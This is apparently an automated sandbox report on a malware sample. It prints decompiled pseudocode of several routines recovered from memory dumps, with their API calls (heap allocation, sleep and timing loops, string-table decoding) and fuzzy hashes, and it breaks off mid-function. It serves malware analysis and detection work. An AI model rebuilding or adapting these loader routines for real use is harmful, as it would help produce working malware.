                                                                                                                                                                                                                                          • Instruction ID: 7f1b2ce798264bf0d6a8f85b7c0a69cde3afc58837c30a78efdd4273d4b3b3bf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 32c0fd6cd0e560628df818c122f9bc710d565fa041d472fb92a728a2ba1876ef
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1313071D40219EFEB01CF94D985BEEBBB9FF48304F108166E901BB290D775AA05DB98
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 78%
                                                                                                                                                                                                                                          			E01121295(intOrPtr* __eax, void** _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                          				intOrPtr _v8;
                                                                                                                                                                                                                                          				void* _v12;
                                                                                                                                                                                                                                          				void* _v16;
                                                                                                                                                                                                                                          				intOrPtr _t26;
                                                                                                                                                                                                                                          				intOrPtr* _t28;
                                                                                                                                                                                                                                          				intOrPtr _t31;
                                                                                                                                                                                                                                          				intOrPtr* _t32;
                                                                                                                                                                                                                                          				void* _t39;
                                                                                                                                                                                                                                          				int _t46;
                                                                                                                                                                                                                                          				intOrPtr* _t47;
                                                                                                                                                                                                                                          				int _t48;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t47 = __eax;
                                                                                                                                                                                                                                          				_push( &_v12);
                                                                                                                                                                                                                                          				_push(__eax);
                                                                                                                                                                                                                                          				_t39 = 0;
                                                                                                                                                                                                                                          				_t46 = 0; // executed
                                                                                                                                                                                                                                          				_t26 =  *((intOrPtr*)( *__eax + 0x24))();
                                                                                                                                                                                                                                          				_v8 = _t26;
                                                                                                                                                                                                                                          				if(_t26 < 0) {
                                                                                                                                                                                                                                          					L13:
                                                                                                                                                                                                                                          					return _v8;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				if(_v12 == 0) {
                                                                                                                                                                                                                                          					Sleep(0xc8);
                                                                                                                                                                                                                                          					_v8 =  *((intOrPtr*)( *_t47 + 0x24))(_t47,  &_v12);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				if(_v8 >= _t39) {
                                                                                                                                                                                                                                          					_t28 = _v12;
                                                                                                                                                                                                                                          					if(_t28 != 0) {
                                                                                                                                                                                                                                          						_t31 =  *((intOrPtr*)( *_t28 + 0x100))(_t28,  &_v16);
                                                                                                                                                                                                                                          						_v8 = _t31;
                                                                                                                                                                                                                                          						if(_t31 >= 0) {
                                                                                                                                                                                                                                          							_t46 = lstrlenW(_v16);
                                                                                                                                                                                                                                          							if(_t46 != 0) {
                                                                                                                                                                                                                                          								_t46 = _t46 + 1;
                                                                                                                                                                                                                                          								_t48 = _t46 + _t46;
                                                                                                                                                                                                                                          								_t39 = E011258BE(_t48);
                                                                                                                                                                                                                                          								if(_t39 == 0) {
                                                                                                                                                                                                                                          									_v8 = 0x8007000e;
                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                          									memcpy(_t39, _v16, _t48);
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          								__imp__#6(_v16);
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t32 = _v12;
                                                                                                                                                                                                                                          						 *((intOrPtr*)( *_t32 + 8))(_t32);
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					 *_a4 = _t39;
                                                                                                                                                                                                                                          					 *_a8 = _t46 + _t46;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				goto L13;
                                                                                                                                                                                                                                          			}














                                                                                                                                                                                                                                          0x011212a1
                                                                                                                                                                                                                                          0x011212a5
                                                                                                                                                                                                                                          0x011212a6
                                                                                                                                                                                                                                          0x011212a7
                                                                                                                                                                                                                                          0x011212a9
                                                                                                                                                                                                                                          0x011212ab
                                                                                                                                                                                                                                          0x011212ae
                                                                                                                                                                                                                                          0x011212b3
                                                                                                                                                                                                                                          0x0112134a
                                                                                                                                                                                                                                          0x01121351
                                                                                                                                                                                                                                          0x01121351
                                                                                                                                                                                                                                          0x011212bc
                                                                                                                                                                                                                                          0x011212c3
                                                                                                                                                                                                                                          0x011212d3
                                                                                                                                                                                                                                          0x011212d3
                                                                                                                                                                                                                                          0x011212d9
                                                                                                                                                                                                                                          0x011212db
                                                                                                                                                                                                                                          0x011212e0
                                                                                                                                                                                                                                          0x011212e9
                                                                                                                                                                                                                                          0x011212ef
                                                                                                                                                                                                                                          0x011212f4
                                                                                                                                                                                                                                          0x011212ff
                                                                                                                                                                                                                                          0x01121303
                                                                                                                                                                                                                                          0x01121305
                                                                                                                                                                                                                                          0x01121306
                                                                                                                                                                                                                                          0x0112130f
                                                                                                                                                                                                                                          0x01121313
                                                                                                                                                                                                                                          0x01121324
                                                                                                                                                                                                                                          0x01121315
                                                                                                                                                                                                                                          0x0112131a
                                                                                                                                                                                                                                          0x0112131f
                                                                                                                                                                                                                                          0x0112132e
                                                                                                                                                                                                                                          0x0112132e
                                                                                                                                                                                                                                          0x01121303
                                                                                                                                                                                                                                          0x01121334
                                                                                                                                                                                                                                          0x0112133a
                                                                                                                                                                                                                                          0x0112133a
                                                                                                                                                                                                                                          0x01121343
                                                                                                                                                                                                                                          0x01121348
                                                                                                                                                                                                                                          0x01121348
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeSleepStringlstrlenmemcpy
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1198164300-0
                                                                                                                                                                                                                                          • Opcode ID: 832ee5bf2667ec966bcbb03c43eb1cbb8bb8f1db3cb91801313fb9e38f6e6e03
                                                                                                                                                                                                                                          • Instruction ID: 9e90053465665c9658a7ac6a0292ed196df63056c17e17a60de735f51f10d1ba
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 832ee5bf2667ec966bcbb03c43eb1cbb8bb8f1db3cb91801313fb9e38f6e6e03
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: BD214F7990121AFFDB15DFA8D8849DEBBB9FF49214B104169EA01E7300EB70DA51CB90
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E011290A1(signed int __edx, void* __edi, void* __esi, intOrPtr _a4) {
                                                                                                                                                                                                                                          				void* _t5;
                                                                                                                                                                                                                                          				void* _t7;
                                                                                                                                                                                                                                          				void* _t10;
                                                                                                                                                                                                                                          				void* _t13;
                                                                                                                                                                                                                                          				void* _t14;
                                                                                                                                                                                                                                          				void* _t15;
                                                                                                                                                                                                                                          				signed int _t16;
                                                                                                                                                                                                                                          				signed int _t22;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t16 = __edx;
                                                                                                                                                                                                                                          				_t5 = HeapCreate(0, 0x400000, 0); // executed
                                                                                                                                                                                                                                          				 *0x112d238 = _t5;
                                                                                                                                                                                                                                          				if(_t5 == 0) {
                                                                                                                                                                                                                                          					_t14 = 8;
                                                                                                                                                                                                                                          					return _t14;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				 *0x112d1a8 = GetTickCount();
                                                                                                                                                                                                                                          				_t7 = E01126A7F(_a4);
                                                                                                                                                                                                                                          				if(_t7 == 0) {
                                                                                                                                                                                                                                          					do {
                                                                                                                                                                                                                                          						_t22 = SwitchToThread() + 8;
                                                                                                                                                                                                                                          						_t10 = E01121C04(_a4, _t22);
                                                                                                                                                                                                                                          						Sleep(0x20 + _t22 * 4); // executed
                                                                                                                                                                                                                                          					} while (_t10 == 1);
                                                                                                                                                                                                                                          					if(E01129511(_t15) != 0) {
                                                                                                                                                                                                                                          						 *0x112d260 = 1; // executed
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t13 = E01124908(_t16); // executed
                                                                                                                                                                                                                                          					return _t13;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t7;
                                                                                                                                                                                                                                          			}











                                                                                                                                                                                                                                          0x011290a1
                                                                                                                                                                                                                                          0x011290aa
                                                                                                                                                                                                                                          0x011290b0
                                                                                                                                                                                                                                          0x011290b7
                                                                                                                                                                                                                                          0x011290bb
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x011290bb
                                                                                                                                                                                                                                          0x011290c8
                                                                                                                                                                                                                                          0x011290cd
                                                                                                                                                                                                                                          0x011290d4
                                                                                                                                                                                                                                          0x011290d8
                                                                                                                                                                                                                                          0x011290e4
                                                                                                                                                                                                                                          0x011290e8
                                                                                                                                                                                                                                          0x011290f7
                                                                                                                                                                                                                                          0x011290fd
                                                                                                                                                                                                                                          0x0112910b
                                                                                                                                                                                                                                          0x0112910d
                                                                                                                                                                                                                                          0x0112910d
                                                                                                                                                                                                                                          0x01129117
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129117
                                                                                                                                                                                                                                          0x0112911c

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapCreate.KERNELBASE(00000000,00400000,00000000,01126F11,?), ref: 011290AA
                                                                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 011290BE
                                                                                                                                                                                                                                          • SwitchToThread.KERNEL32(?,00000001,?), ref: 011290D8
                                                                                                                                                                                                                                          • Sleep.KERNELBASE(00000000,-00000008,?,00000001,?), ref: 011290F7
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: CountCreateHeapSleepSwitchThreadTick
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 377297877-0
                                                                                                                                                                                                                                          • Opcode ID: 414da4bf241b674f2b7deea0f8addf3e694a203bff9349e3ebc28fcc99d84573
                                                                                                                                                                                                                                          • Instruction ID: 6c18d834ea0a365b0bae0ee006e1c7cac53655424b547ea86ee595ea11999b30
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 414da4bf241b674f2b7deea0f8addf3e694a203bff9349e3ebc28fcc99d84573
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 63F0C8756002397ADB3D6F7DAC08B4E3AA56F5666DF100035E915D3144EB38C470C7A6
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E011268CF() {
                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                          				int _v12;
                                                                                                                                                                                                                                          				WCHAR* _v16;
                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                          				void* _t23;
                                                                                                                                                                                                                                          				intOrPtr _t24;
                                                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                                                          				intOrPtr _t32;
                                                                                                                                                                                                                                          				intOrPtr _t35;
                                                                                                                                                                                                                                          				intOrPtr _t38;
                                                                                                                                                                                                                                          				intOrPtr _t42;
                                                                                                                                                                                                                                          				void* _t45;
                                                                                                                                                                                                                                          				void* _t51;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_v12 = 0;
                                                                                                                                                                                                                                          				_t23 = E01129138(0,  &_v8); // executed
                                                                                                                                                                                                                                          				if(_t23 != 0) {
                                                                                                                                                                                                                                          					_v8 = 0;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t24 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_t4 = _t24 + 0x112ede0; // 0x5649388
                                                                                                                                                                                                                                          				_t5 = _t24 + 0x112ed88; // 0x4f0053
                                                                                                                                                                                                                                          				_t26 = E01121B13( &_v16, _v8, _t5, _t4); // executed
                                                                                                                                                                                                                                          				_t45 = _t26;
                                                                                                                                                                                                                                          				if(_t45 == 0) {
                                                                                                                                                                                                                                          					StrToIntExW(_v16, 0,  &_v12);
                                                                                                                                                                                                                                          					_t45 = 8;
                                                                                                                                                                                                                                          					if(_v12 < _t45) {
                                                                                                                                                                                                                                          						_t45 = 1;
                                                                                                                                                                                                                                          						__eflags = 1;
                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                          						_t32 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          						_t11 = _t32 + 0x112edd4; // 0x564937c
                                                                                                                                                                                                                                          						_t48 = _t11;
                                                                                                                                                                                                                                          						_t12 = _t32 + 0x112ed88; // 0x4f0053
                                                                                                                                                                                                                                          						_t51 = E01125FCB(_t11, _t12, _t11);
                                                                                                                                                                                                                                          						_t58 = _t51;
                                                                                                                                                                                                                                          						if(_t51 != 0) {
                                                                                                                                                                                                                                          							_t35 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          							_t13 = _t35 + 0x112ea59; // 0x30314549
                                                                                                                                                                                                                                          							if(E011275E7(_t48, _t58, _v8, _t51, _t13, 0x14) == 0) {
                                                                                                                                                                                                                                          								_t60 =  *0x112d25c - 6;
                                                                                                                                                                                                                                          								if( *0x112d25c <= 6) {
                                                                                                                                                                                                                                          									_t42 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          									_t15 = _t42 + 0x112ec3a; // 0x52384549
                                                                                                                                                                                                                                          									E011275E7(_t48, _t60, _v8, _t51, _t15, 0x13);
                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							_t38 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          							_t17 = _t38 + 0x112ee18; // 0x56493c0
                                                                                                                                                                                                                                          							_t18 = _t38 + 0x112edf0; // 0x680043
                                                                                                                                                                                                                                          							_t45 = E01121BC1(_v8, 0x80000001, _t51, _t18, _t17);
                                                                                                                                                                                                                                          							HeapFree( *0x112d238, 0, _t51);
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					HeapFree( *0x112d238, 0, _v16);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t53 = _v8;
                                                                                                                                                                                                                                          				if(_v8 != 0) {
                                                                                                                                                                                                                                          					E0112568A(_t53);
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				return _t45;
                                                                                                                                                                                                                                          			}

















                                                                                                                                                                                                                                          0x011268df
                                                                                                                                                                                                                                          0x011268e2
                                                                                                                                                                                                                                          0x011268e9
                                                                                                                                                                                                                                          0x011268eb
                                                                                                                                                                                                                                          0x011268eb
                                                                                                                                                                                                                                          0x011268ee
                                                                                                                                                                                                                                          0x011268f3
                                                                                                                                                                                                                                          0x011268fa
                                                                                                                                                                                                                                          0x01126907
                                                                                                                                                                                                                                          0x0112690c
                                                                                                                                                                                                                                          0x01126910
                                                                                                                                                                                                                                          0x0112691e
                                                                                                                                                                                                                                          0x0112692c
                                                                                                                                                                                                                                          0x01126930
                                                                                                                                                                                                                                          0x011269c1
                                                                                                                                                                                                                                          0x011269c1
                                                                                                                                                                                                                                          0x01126936
                                                                                                                                                                                                                                          0x01126936
                                                                                                                                                                                                                                          0x0112693b
                                                                                                                                                                                                                                          0x0112693b
                                                                                                                                                                                                                                          0x01126942
                                                                                                                                                                                                                                          0x0112694e
                                                                                                                                                                                                                                          0x01126950
                                                                                                                                                                                                                                          0x01126952
                                                                                                                                                                                                                                          0x01126954
                                                                                                                                                                                                                                          0x0112695b
                                                                                                                                                                                                                                          0x0112696d
                                                                                                                                                                                                                                          0x0112696f
                                                                                                                                                                                                                                          0x01126976
                                                                                                                                                                                                                                          0x01126978
                                                                                                                                                                                                                                          0x0112697f
                                                                                                                                                                                                                                          0x0112698a
                                                                                                                                                                                                                                          0x0112698a
                                                                                                                                                                                                                                          0x01126976
                                                                                                                                                                                                                                          0x0112698f
                                                                                                                                                                                                                                          0x01126994
                                                                                                                                                                                                                                          0x0112699b
                                                                                                                                                                                                                                          0x011269b9
                                                                                                                                                                                                                                          0x011269bb
                                                                                                                                                                                                                                          0x011269bb
                                                                                                                                                                                                                                          0x01126952
                                                                                                                                                                                                                                          0x011269cd
                                                                                                                                                                                                                                          0x011269cd
                                                                                                                                                                                                                                          0x011269cf
                                                                                                                                                                                                                                          0x011269d4
                                                                                                                                                                                                                                          0x011269d6
                                                                                                                                                                                                                                          0x011269d6
                                                                                                                                                                                                                                          0x011269e1

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,05649388,00000000,?,7519F710,00000000,7519F730), ref: 0112691E
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,056493C0,?,00000000,30314549,00000014,004F0053,0564937C), ref: 011269BB
                                                                                                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,01129C10), ref: 011269CD
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: FreeHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3298025750-0
                                                                                                                                                                                                                                          • Opcode ID: de01e335207ccdb6a5b2288b507478a869f44659ff893ca11b8c2685409e3f79
                                                                                                                                                                                                                                          • Instruction ID: 81121ed53f0a1b8462909cef2e595553fdefd080f9f2e91f4d766c005e97a5d6
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: de01e335207ccdb6a5b2288b507478a869f44659ff893ca11b8c2685409e3f79
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3831A231A00129BFEF29EFD4DC88EDE7BBDEB04614F100065FA049B054EB709A68CB50
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 59%
                                                                                                                                                                                                                                          			E01129F11(void* __ecx, void* __edx, char _a4, void** _a8, intOrPtr* _a12, intOrPtr* _a16, intOrPtr* _a20) {
                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                          				intOrPtr _t19;
                                                                                                                                                                                                                                          				void* _t25;
                                                                                                                                                                                                                                          				void* _t26;
                                                                                                                                                                                                                                          				void* _t31;
                                                                                                                                                                                                                                          				void* _t37;
                                                                                                                                                                                                                                          				void* _t41;
                                                                                                                                                                                                                                          				intOrPtr _t43;
                                                                                                                                                                                                                                          				void* _t44;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t37 = __edx;
                                                                                                                                                                                                                                          				_t33 = __ecx;
                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                          				_push(__ecx);
                                                                                                                                                                                                                                          				_t43 =  *0x112d2a4; // 0x451a5a8
                                                                                                                                                                                                                                          				_push(0x800);
                                                                                                                                                                                                                                          				_push(0);
                                                                                                                                                                                                                                          				_push( *0x112d238);
                                                                                                                                                                                                                                          				_t1 = _t43 + 0x112e791; // 0x6976612e
                                                                                                                                                                                                                                          				_t44 = _t1;
                                                                                                                                                                                                                                          				if( *0x112d24c >= 5) {
                                                                                                                                                                                                                                          					if(RtlAllocateHeap() == 0) {
                                                                                                                                                                                                                                          						L6:
                                                                                                                                                                                                                                          						_t31 = 8;
                                                                                                                                                                                                                                          						L7:
                                                                                                                                                                                                                                          						if(_t31 != 0) {
                                                                                                                                                                                                                                          							L10:
                                                                                                                                                                                                                                          							 *0x112d24c =  *0x112d24c + 1;
                                                                                                                                                                                                                                          							L11:
                                                                                                                                                                                                                                          							return _t31;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t46 = _a4;
                                                                                                                                                                                                                                          						_t41 = _v8;
                                                                                                                                                                                                                                          						 *_a16 = _a4;
                                                                                                                                                                                                                                          						 *_a20 = E01127CF7(_a4, _t41); // executed
                                                                                                                                                                                                                                          						_t19 = E011260CF(_t41, _t41, _t46); // executed
                                                                                                                                                                                                                                          						if(_t19 != 0) {
                                                                                                                                                                                                                                          							 *_a8 = _t41;
                                                                                                                                                                                                                                          							 *_a12 = _t19;
                                                                                                                                                                                                                                          							if( *0x112d24c < 5) {
                                                                                                                                                                                                                                          								 *0x112d24c =  *0x112d24c & 0x00000000;
                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                          							goto L11;
                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                          						_t31 = 0xbf;
                                                                                                                                                                                                                                          						E01126106();
                                                                                                                                                                                                                                          						RtlFreeHeap( *0x112d238, 0, _t41); // executed
                                                                                                                                                                                                                                          						goto L10;
                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                          					_t25 = E0112514F(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t14);
                                                                                                                                                                                                                                          					L5:
                                                                                                                                                                                                                                          					_t31 = _t25;
                                                                                                                                                                                                                                          					goto L7;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t26 = RtlAllocateHeap(); // executed
                                                                                                                                                                                                                                          				if(_t26 == 0) {
                                                                                                                                                                                                                                          					goto L6;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				_t25 = E01121754(_a4, _t33, _t37, _t44,  &_v8,  &_a4, _t26); // executed
                                                                                                                                                                                                                                          				goto L5;
                                                                                                                                                                                                                                          			}













                                                                                                                                                                                                                                          0x01129f11
                                                                                                                                                                                                                                          0x01129f11
                                                                                                                                                                                                                                          0x01129f14
                                                                                                                                                                                                                                          0x01129f15
                                                                                                                                                                                                                                          0x01129f1f
                                                                                                                                                                                                                                          0x01129f26
                                                                                                                                                                                                                                          0x01129f2b
                                                                                                                                                                                                                                          0x01129f2d
                                                                                                                                                                                                                                          0x01129f33
                                                                                                                                                                                                                                          0x01129f33
                                                                                                                                                                                                                                          0x01129f39
                                                                                                                                                                                                                                          0x01129f61
                                                                                                                                                                                                                                          0x01129f79
                                                                                                                                                                                                                                          0x01129f7b
                                                                                                                                                                                                                                          0x01129f7c
                                                                                                                                                                                                                                          0x01129f7e
                                                                                                                                                                                                                                          0x01129fbc
                                                                                                                                                                                                                                          0x01129fbc
                                                                                                                                                                                                                                          0x01129fc2
                                                                                                                                                                                                                                          0x01129fc8
                                                                                                                                                                                                                                          0x01129fc8
                                                                                                                                                                                                                                          0x01129f80
                                                                                                                                                                                                                                          0x01129f86
                                                                                                                                                                                                                                          0x01129f89
                                                                                                                                                                                                                                          0x01129f98
                                                                                                                                                                                                                                          0x01129f9a
                                                                                                                                                                                                                                          0x01129fa1
                                                                                                                                                                                                                                          0x01129fd5
                                                                                                                                                                                                                                          0x01129fda
                                                                                                                                                                                                                                          0x01129fdc
                                                                                                                                                                                                                                          0x01129fde
                                                                                                                                                                                                                                          0x01129fde
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129fdc
                                                                                                                                                                                                                                          0x01129fa3
                                                                                                                                                                                                                                          0x01129fa8
                                                                                                                                                                                                                                          0x01129fb6
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129fb6
                                                                                                                                                                                                                                          0x01129f70
                                                                                                                                                                                                                                          0x01129f75
                                                                                                                                                                                                                                          0x01129f75
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129f75
                                                                                                                                                                                                                                          0x01129f3b
                                                                                                                                                                                                                                          0x01129f43
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                          0x01129f52
                                                                                                                                                                                                                                          0x00000000

                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 01129F3B
                                                                                                                                                                                                                                            • Part of subcall function 01121754: GetTickCount.KERNEL32 ref: 01121768
                                                                                                                                                                                                                                            • Part of subcall function 01121754: wsprintfA.USER32 ref: 011217B8
                                                                                                                                                                                                                                            • Part of subcall function 01121754: wsprintfA.USER32 ref: 011217D5
                                                                                                                                                                                                                                            • Part of subcall function 01121754: wsprintfA.USER32 ref: 01121801
                                                                                                                                                                                                                                            • Part of subcall function 01121754: HeapFree.KERNEL32(00000000,?), ref: 01121813
                                                                                                                                                                                                                                            • Part of subcall function 01121754: wsprintfA.USER32 ref: 01121834
                                                                                                                                                                                                                                            • Part of subcall function 01121754: HeapFree.KERNEL32(00000000,?), ref: 01121844
                                                                                                                                                                                                                                            • Part of subcall function 01121754: RtlAllocateHeap.NTDLL(00000000,00000800), ref: 01121872
                                                                                                                                                                                                                                            • Part of subcall function 01121754: GetTickCount.KERNEL32 ref: 01121883
                                                                                                                                                                                                                                          • RtlAllocateHeap.NTDLL(00000000,00000800,7519F710), ref: 01129F59
                                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,?,?,01129C62,00000002,?,?,?,?), ref: 01129FB6
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.601524786.0000000001121000.00000020.00000001.sdmp, Offset: 01120000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601513093.0000000001120000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601557787.000000000112C000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601573692.000000000112D000.00000004.00000001.sdmp Download File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.601594857.000000000112F000.00000002.00000001.sdmp Download File
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Heap$wsprintf$AllocateFree$CountTick
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1676223858-0
                                                                                                                                                                                                                                          • Opcode ID: 260786e2aa68dbf9e794c2bc8a27236ddd08776b50ff06a127e016750d6301b8
                                                                                                                                                                                                                                          • Instruction ID: 64ad7b04a878cc53a50b6a659ddaba8d59c3985aad6683b07521c4daaff3da1a
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 260786e2aa68dbf9e794c2bc8a27236ddd08776b50ff06a127e016750d6301b8
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 08216275200229FBDB6DDF98E840EDA3BBCEB49358F104025F912D7244D770E965CBA2
                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                                                                          			E004016E4() {
                                                                                                                                                                                                                                          				char _v16;
                                                                                                                                                                                                                                          				intOrPtr _v28;
                                                                                                                                                                                                                                          				void _v32;
                                                                                                                                                                                                                                          				void* _v36;
                                                                                                                                                                                                                                          				intOrPtr _t15;
                                                                                                                                                                                                                                          				void* _t16;
                                                                                                                                                                                                                                          				long _t25;
                                                                                                                                                                                                                                          				int _t26;
                                                                                                                                                                                                                                          				intOrPtr _t30;
                                                                                                                                                                                                                                          				void* _t32;
                                                                                                                                                                                                                                          				signed int _t35;
                                                                                                                                                                                                                                          				intOrPtr* _t37;
                                                                                                                                                                                                                                          				intOrPtr _t39;
                                                                                                                                                                                                                                          				int _t44;
                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                          				_t15 =  *0x404144;
                                                                                                                                                                                                                                          				if( *0x40412c > 5) {
                                                                                                                                                                                                                                          					_t16 = _t15 + 0x4050f4;
                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                          					_t16 = _t15 + 0x4050b1;
                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                          				E00401000(_t16, _t16);
                                                                                                                                                                                                                                          				_t35 = 6;
                                                                                                                                                                                                                                          				memset( &_v32, 0, _t35 << 2);
                                                                                                                                                                                                                                          				if(E00401D86( &_v32,  &_v16,  *0x404140 ^ 0xc786104c) == 0) {
                                                                                                                                                                                                                                          					_t25 = 0xb;
